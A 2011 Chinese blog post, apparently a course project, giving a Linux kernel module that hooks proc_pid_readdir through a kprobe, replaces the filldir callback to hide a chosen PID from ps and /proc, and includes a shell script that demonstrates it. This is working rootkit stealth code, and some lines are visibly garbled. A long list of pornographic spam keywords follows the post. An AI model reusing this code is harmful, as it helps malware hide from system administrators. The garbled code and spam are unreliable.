• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>

    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>

            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            

    
            

            




            







												


        

            
	
            
		
			

            

            
	
            
		
			
            糯米
            
			TI DaVinci, gstreamer, ffmpeg
		            		
	
            

            

            

            

            隨筆 - 167, 文章 - 0, 評論 - 47, 引用 - 0
            

            


            		
	
            

            

            
	
            
		
			
            
				數據加載中……
			
            
		            		
		
			
            
				
					
	
            
		
            
			Linux內核通過inline hook實現隱藏進程
		
            
		
            
		這是我們操作系統的大作業。
            原理就是inline hook 那個 proc 文件系統,根目錄下的 readdir 的函數。
            替換掉第三個參數,filldir。
            代碼爆短,60來行。
            Ubuntu 10.04 測試可用。

            

            #include <linux/kernel.h>
            #include             <linux/kprobes.h>
            #include             <linux/module.h>
            #include             <linux/moduleparam.h>
            #include             <linux/fs.h>

            int register_kprobe(struct kprobe *kp);

            static struct kprobe kp = {
                .symbol_name                = "proc_pid_readdir",
            }            ;

            static filldir_t old_filldir;
            static int pid;

            module_param(pid,             int0744);

            static int filldir(void * __buf, const char * name, int namlen, loff_t offset,
                       u64 ino, unsigned             int d_type)
            {
                            int p;
                sscanf(name,             "%d"&p);
                            if (p == pid)
                                return 0;
                            return old_filldir(__buf, name, namlen, offset, ino, d_type);
            }


            /* kprobe pre_handler: called just before the probed instruction is executed */
            static int handler_pre(struct kprobe *pr, struct pt_regs *regs)
            {
                old_filldir             = (filldir_t)regs->cx;
                regs            ->cx = (typeof(regs->cx))filldir;
                            return 0;
            }

            static int __init k_init(void)
            {
                            int ret;

                kp.pre_handler             = handler_pre;

                ret             = register_kprobe(&kp);
                            if (ret < 0{
                    printk(KERN_INFO             "register_kprobe failed, returned %d\n", ret);
                                return ret;
                }
                printk(KERN_INFO             "Planted kprobe at %p; pid %d\n", kp.addr, pid);

                            return 0;
            }

            static void __exit k_exit(void)
            {
                unregister_kprobe(            &kp);
                printk(KERN_INFO             "kprobe at %p unregistered\n", kp.addr);
            }

            module_init(k_init);
            module_exit(k_exit);
            MODULE_LICENSE(            "GPL");

            


            

            sleep 1000 &
            pid            =`jobs -p`
            echo             'before hide'
            ps aux             | grep $pid
            insmod k.ko pid            =$pid
            echo             'after hide'
            ps aux             | grep $pid
            rmmod k.ko
            echo             'after unhide'
            ps aux             | grep $pid
            

            
		
            
		
            
			posted on 2011-02-23 14:58 糯米 閱讀(2263) 評論(1)  編輯 收藏 引用  所屬分類: Linux 
		
            
	
            
	
	


	


            
	    
    


            

            評論
            
	
	
			
            
				
            
					# re: Linux內核通過inline hook實現隱藏進程  回復  更多評論
					  
				
            
				handler_pre() 函數中為什么 regs->cx 修改為hook函數就能執行hook之后的函數?

            我使用同樣的方式修改這個內核函數 usb_alloc_dev,然而regs->cx存放的并不是有效地地址,是0x00000001
				
            
					2011-12-22 18:31 | quietjolt
				
            
			
            
		

            





            






            

				
			
            
		            		
	
            
	
            
		
			

		
	
            

            

    
    







            
	   
	



中文字幕无码精品亚洲资源网久久|
国产成人99久久亚洲综合精品|
久久婷婷五月综合成人D啪|
日韩欧美亚洲综合久久影院Ds
|
中文国产成人精品久久不卡
|
亚洲中文久久精品无码|
国内精品久久久久久99|
三级片免费观看久久|
人人狠狠综合久久88成人|
狠狠色丁香婷婷综合久久来来去
|
亚洲国产成人久久综合一
|
青青青国产精品国产精品久久久久
|
人妻久久久一区二区三区|
国产99久久九九精品无码|
久久亚洲AV无码精品色午夜麻豆
|
久久久久综合网久久|
亚洲国产精品成人久久蜜臀|
人妻无码αv中文字幕久久|
亚洲AV伊人久久青青草原|
一本一道久久精品综合
|
国产福利电影一区二区三区久久久久成人精品综合
|
亚洲午夜无码AV毛片久久|
久久精品麻豆日日躁夜夜躁|
婷婷久久综合九色综合绿巨人|
久久精品aⅴ无码中文字字幕重口
久久精品a亚洲国产v高清不卡
|
久久99精品久久久久久hb无码
|
精品久久香蕉国产线看观看亚洲|
香蕉久久AⅤ一区二区三区|
色综合久久88色综合天天|
97久久超碰国产精品旧版|
AV无码久久久久不卡蜜桃|
久久人人爽人人爽人人片av麻烦|
伊人久久大香线蕉无码麻豆|
国产成人精品久久|
国产99久久久久久免费看|
国产精品丝袜久久久久久不卡|
久久精品草草草|
久久久久久一区国产精品|
久久夜色精品国产www|
欧美性猛交xxxx免费看久久久|
久久久久18|